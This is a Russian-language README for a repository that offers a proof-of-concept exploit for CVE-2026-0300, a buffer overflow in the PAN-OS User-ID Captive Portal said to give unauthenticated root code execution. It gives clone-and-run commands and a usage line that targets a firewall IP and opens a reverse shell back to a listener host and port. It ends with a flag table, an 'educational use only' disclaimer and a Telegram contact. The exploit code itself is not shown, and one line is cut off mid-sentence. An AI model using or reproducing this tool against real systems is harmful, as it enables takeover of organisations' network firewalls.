
Доказательство концепции для CVE-2026-0300, критического переполнения буфера в PAN-OS User-ID Portal, позволяющего неаутентифицированное удалённое выполнение кода с правами root.
CVE-2026-0300 — это уязвимость переполнения буфера высокой степени серьезности, обнаруженная в Palo Alto Networks PAN-OS портале аутентификации User-ID™ (Captive Portal). Данный исследовательский репозиторий демонстрирует техническую логику уязвимости, уделяя особое внимание тому, как неаутентифицированный сетевой пакет может привести к удаленному выполнению кода (RCE) с привилегиями root.
| Характеристика | Детали |
|---|---|
| ID CVE | CVE-2026-0300 |
| Оценка серьезности | 9.3 (Критическая) |
| Тип слабости | CWE-787: Выход за границы буфера при записи |
| Вектор атаки | Сеть (без аутентификации) |
| Требуемые привилегии | Нет |
| Взаимодействие с пользователем | Нет |
| Затронутое ПО | PAN-OS 12.1, 11.2, 11.1, 10.2 |
Уязвимость возникает, когда служба портала аутентификации User-ID не проверяет длину входящих данных перед записью их в буфер памяти.
socket, struct и argparse).git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git
cd CVE-2026-0300-POC
chmod +x research_poc.py
Этот инструмент разработан с профессиональным CLI (интерфейсом командной строки).
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>
| Флаг | Имя | Описание | По умолчанию |
|---|---|---|---|
| -t | --target | (Обязательно) IP-адрес целевого межсетевого экрана. | Н/Д |
| -p | --port | Порт, на котором работает портал User-ID. | 6082 |
| -o | --offset | Длина в байтах для достижения точки переполнения памяти. | 2048 |
| -r | --ret | Шестнадцатеричный адрес возврата. | 0xdeadbeef |
| -l | --lhost | IP-адрес для reverse shell | Ваш IP |
| -L | --lport | Ваш порт прослушивания | 4444 |
ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ИССЛЕДОВАНИЙ. Несанкционированное тестирование систем, которыми вы не владеете, является незаконным. Автор не несет ответственности за любое неправомерное использование этого исследовательского кода. Используйте ответственно для повышения глобальной безопасности. Разработано: https://t.me/p3Nt3st3rsTAr Дата обнаружения уязвимости: 07 мая 2026 г.